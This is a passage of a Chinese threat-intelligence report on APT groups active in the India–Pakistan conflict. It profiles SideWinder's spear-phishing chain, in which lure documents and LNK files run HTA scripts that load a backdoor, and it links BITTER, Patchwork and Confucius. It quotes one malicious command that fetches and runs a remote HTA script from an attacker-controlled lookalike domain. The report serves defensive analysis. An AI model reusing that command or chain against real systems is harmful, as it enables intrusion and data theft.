印巴战争阴影下的网络战——近期印巴APT组织攻击活动汇总
一、背景
印度和巴基斯坦同属于南亚地区的两个国家,但是由于一些历史原因,两国关系一直不大和睦,冲突不断。从2019年初开始,双方关系突然紧张,冲突升级。2月26日,印度空军飞越克什米尔印巴实际控制线,被巴基斯坦军方击落并俘获一名印度空军飞行员,同时这也是印度首次袭击巴基斯坦境内。前段时间两国在克什米尔印军队集结并且频繁交火,印方甚至水淹巴基斯坦,打开阿尔奇大坝,造成巴基斯坦面临洪水的危机,同时印方几日前公开宣称,可能会先对巴基斯坦使用核武措施。
随着双方的军事冲突愈演愈烈时,网络战场上也硝烟四起。就在印度空军被俘事件后,腾讯安全御见威胁情报中心曾捕获并发布了一例以此次冲突事件为诱饵的APT攻击样本,分析后确认了该样本源于巴基斯坦的APT攻击组织TransparentTribe(见参考文章1),此外印度针对巴基斯坦的攻击活动也一直在持续中,腾讯安全御见威胁情报中心也曾多次发布相关的分析报告(见参考文章2、3)。
网络战被认为是地缘政治的延伸,甚至是战争和冲突的一部分。APT攻击做为网络战中的重要攻击活动,其活跃趋势跟地缘政治等全球热点问题密切相关,全球APT攻击高发区域也是全球地缘政治冲突的敏感地域。纵观2019年活跃的网络攻击活动,无一不是政治局势复杂和敏感的地域,包括朝鲜半岛、委内瑞拉、中东等等。网络战已成为国家间政治博弈甚至是现代战争的重要组成部分。
回到印巴冲突中,腾讯安全御见威胁情报中心捕获到大量关于印巴网络攻击的恶意样本。经过深度分析和跟踪溯源,我们归类出较为活跃的几个APT组织,包括SideWinder(响尾蛇),BITTER(蔓灵花),白象、Donot,TransparentTribe等。同时在分析溯源的过程中,我们还发现APT组织之间相互伪装,试图来混淆安全人员分析,躲避追踪。本文为对该些活动和组织的一些总结,可能会存在一定的疏漏,还请业内同行再作补充。
二、疑似来自印度的攻击
印方在对巴基斯坦的网络攻击活动中,一直处于强势和主导的地步,还涉及到跟印度相关的APT攻击组织也相对较多,较有代表性的包括SideWinder(响尾蛇),BITTER(蔓灵花),白象、Donot等。
1、SideWinder(响尾蛇)
· 组织概况
SideWinder(响尾蛇)是腾讯安全御见威胁情报中心最早在2018年披露的APT攻击组织,得名由来为该组织的背景跟卡巴斯基在2018年第一季度报告中提到的SideWinder组织非常的相似,虽然卡巴斯基并未发布任何该组织的技术细节和报告。即便如此,我们还是继续沿用卡巴斯基的命名,命名该组织为"响尾蛇"。该组织的最早的攻击活动可以追溯到 2012 年。在2019年2月,腾讯安全御见威胁情报中心再次详细的披露过该组织在2018年下半年的一些攻击活动。此外,国内有多个安全公司也同时披露过该组织的其他的一些攻击活动。
· 攻击目标
主要为巴基斯坦政府部门(如内阁部门)、巴基斯坦军方、军事目标等。
· 技术手段
SideWinder(响尾蛇)主要采用鱼叉攻击的方式,投递带有漏洞的office文档或者包含恶意lnk的压缩包文件,受害者打开office文档或者恶意lnk文件后会下载执行hta文件,通过执行hta脚本进一步下载后门RAT。
如某次攻击的钓鱼邮件:
如某次攻击的诱饵:
压缩包解压后为一个恶意的lnk文件:
执行命令:
%windir%/system32/mshtb.exe http://www.download.fbr.gov.pk.cdn-ps.net/images/5DC7A431/11991/5183/fad436c7/60b9f1d
执行的脚本后,除了收集本地杀软信息外,还会解密诱饵pdf文件内容并且打开,随着继续下载下一阶段的hta脚本。
打开的诱饵pdf内容为:
hta脚本为最终会使用一个白加黑技术,来执行最终的后门文件SystemApp.dll,该后门用来进行信息的收集,包括系统信息、文件信息等。
白加黑文件:
后门内容:
此外,其他的攻击中,该组织还会使用VB的RAT,如:
· 组织小结
2、BITTER(蔓灵花) & Patchwork(白象)& White Company & Confucius(孔子)
· 组织概况
之所以把这几个组织放在一起,是因为我们相信,该四个组织之间都存在一定的关联,甚至为同一组织或同一组织分化出来的不同的小组。如BITTER(蔓灵花)跟Patchwork(白象)和还有Confucius(孔子),我们不止一次的在我们的分析报告中指出存在包括武器库、基础设施等的共用的证据,如《蔓灵花(BITTER)APT组织针对中国境内政府、军工、核能等敏感机构的最新攻击活动报告》等。